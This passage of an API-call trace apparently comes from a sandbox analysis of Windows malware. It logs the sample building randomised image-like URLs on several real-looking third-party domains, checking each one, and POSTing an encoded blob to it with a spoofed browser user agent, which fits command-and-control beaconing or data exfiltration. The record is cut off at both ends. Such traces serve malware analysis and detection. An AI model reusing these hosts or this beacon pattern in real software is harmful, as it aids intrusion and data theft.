(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0121.698] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0121.698] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0121.698] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0121.698] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0121.698] InternetConnectW (hInternet=0xcc0004, lpszServerName="zaeba.co.uk", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0121.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0121.698] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="uploads/assets/kathmoru.bmp") returned 27 [0121.698] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/assets/kathmoru.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0121.698] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000, dwOptionalLength=0x24c) returned 0 [0121.702] GetLastError () returned 0x2ee7 [0121.702] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0121.702] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0121.702] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.703] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.703] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0121.703] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.n2plus.co.th") returned 23 [0121.703] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0121.703] lstrcpyW (in: lpString1=0x2e8da80, lpString2="image" | out: lpString1="image") returned="image" [0121.703] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0121.703] lstrcatW (in: lpString1="es", lpString2="im" | out: lpString1="esim") returned="esim" [0121.703] lstrcatW (in: lpString1="esim", lpString2="de" | out: lpString1="esimde") returned="esimde" [0121.703] lstrcatW (in: lpString1="esimde", lpString2="se" | out: lpString1="esimdese") returned="esimdese" [0121.703] lstrcatW (in: lpString1="esimdese", lpString2="fu" | out: lpString1="esimdesefu") returned="esimdesefu" [0121.703] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0121.703] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.n2plus.co.th/news/image/esimdesefu.png") returned 49 [0121.704] lstrlenW (lpString="http://www.n2plus.co.th/news/image/esimdesefu.png") returned 49 [0121.704] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/image/esimdesefu.png" | out: lpString1="news/image/esimdesefu.png") returned="news/image/esimdesefu.png" [0121.704] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0121.704] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0121.704] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.n2plus.co.th", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0121.704] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0121.704] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0121.704] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0123.782] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0123.782] lstrcmpiA (lpString1="50x", lpString2="30x") returned 1 [0123.782] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0123.782] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0123.782] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0123.782] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0123.783] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0123.783] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0123.783] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0123.783] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0123.783] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0123.783] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.n2plus.co.th", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0123.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0123.783] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="news/image/esimdesefu.png") returned 25 [0123.784] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/image/esimdesefu.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0123.784] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0124.223] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0124.223] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0124.223] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.224] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.224] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0124.224] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://koloritplus.ru") returned 21 [0124.224] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0124.224] lstrcpyW (in: lpString1=0x2e8da80, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0124.224] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="me" | out: lpString1="me") returned="me" [0124.224] lstrcatW (in: lpString1="me", lpString2="zu" | out: lpString1="mezu") returned="mezu" [0124.224] lstrcatW (in: lpString1="mezu", lpString2="es" | out: lpString1="mezues") returned="mezues" [0124.224] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0124.224] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://koloritplus.ru/static/tmp/mezues.jpg") returned 43 [0124.224] lstrlenW (lpString="http://koloritplus.ru/static/tmp/mezues.jpg") returned 43 [0124.224] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/tmp/mezues.jpg" | out: lpString1="static/tmp/mezues.jpg") returned="static/tmp/mezues.jpg" [0124.224] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0124.224] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0124.224] InternetConnectW (hInternet=0xcc0008, lpszServerName="koloritplus.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0124.224] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0124.224] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0124.225] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0124.641] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0124.641] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0124.641] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0124.643] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0124.643] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0124.643] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0124.643] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0124.643] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0124.643] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0124.643] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0124.643] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0124.643] InternetConnectW (hInternet=0xcc0004, lpszServerName="koloritplus.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0124.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0124.644] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="static/tmp/mezues.jpg") returned 21 [0124.644] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/tmp/mezues.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0124.644] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0125.029] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0125.030] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0125.030] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.030] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.031] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0125.031] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://h5s.vn") returned 13 [0125.031] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0125.031] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pictures" | out: lpString1="pictures") returned="pictures" [0125.031] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="mo" | out: lpString1="mo") returned="mo" [0125.031] lstrcatW (in: lpString1="mo", lpString2="de" | out: lpString1="mode") returned="mode" [0125.031] lstrcatW (in: lpString1="mode", lpString2="th" | out: lpString1="modeth") returned="modeth" [0125.031] lstrcatW (in: lpString1="modeth", lpString2="so" | out: lpString1="modethso") returned="modethso" [0125.031] lstrcatW (in: lpString1="modethso", lpString2="so" | out: lpString1="modethsoso") returned="modethsoso" [0125.031] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0125.031] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://h5s.vn/news/pictures/modethsoso.png") returned 42 [0125.031] lstrlenW (lpString="http://h5s.vn/news/pictures/modethsoso.png") returned 42 [0125.031] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/pictures/modethsoso.png" | out: lpString1="news/pictures/modethsoso.png") returned="news/pictures/modethsoso.png" [0125.031] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0125.031] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0125.031] InternetConnectW (hInternet=0xcc0008, lpszServerName="h5s.vn", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0125.031] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0125.031] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0125.031] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0126.437] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0126.437] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0126.437] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0126.439] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0126.439] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0126.439] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0126.439] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0126.439] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0126.439] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0126.440] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0126.440] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0126.440] InternetConnectW (hInternet=0xcc0004, lpszServerName="h5s.vn", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0126.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0126.440] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="news/pictures/modethsoso.png") returned 28 [0126.440] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/pictures/modethsoso.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0126.440] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0127.418] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0127.421] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0127.421] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.422] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0127.422] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0127.422] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://marketisleri.com") returned 23 [0127.422] lstrcpyW (in: lpString1=0x2e8d880, lpString2="data" | out: lpString1="data") returned="data" [0127.422] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pictures" | out: lpString1="pictures") returned="pictures" [0127.422] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0127.422] lstrcatW (in: lpString1="fu", lpString2="es" | out: lpString1="fues") returned="fues" [0127.423] lstrcatW (in: lpString1="fues", lpString2="so" | out: lpString1="fuesso") returned="fuesso" [0127.423] lstrcatW (in: lpString1="fuesso", lpString2="zu" | out: lpString1="fuessozu") returned="fuessozu" [0127.423] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0127.423] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://marketisleri.com/data/pictures/fuessozu.png") returned 50 [0127.423] lstrlenW (lpString="http://marketisleri.com/data/pictures/fuessozu.png") returned 50 [0127.423] lstrcpyW (in: lpString1=0x2e8d618, lpString2="data/pictures/fuessozu.png" | out: lpString1="data/pictures/fuessozu.png") returned="data/pictures/fuessozu.png" [0127.423] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.425] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0127.425] InternetConnectW (hInternet=0xcc0008, lpszServerName="marketisleri.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0127.425] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0127.425] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0127.425] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0127.651] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0127.651] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0127.651] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0127.653] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0127.653] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0127.653] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0127.654] lstrlenA 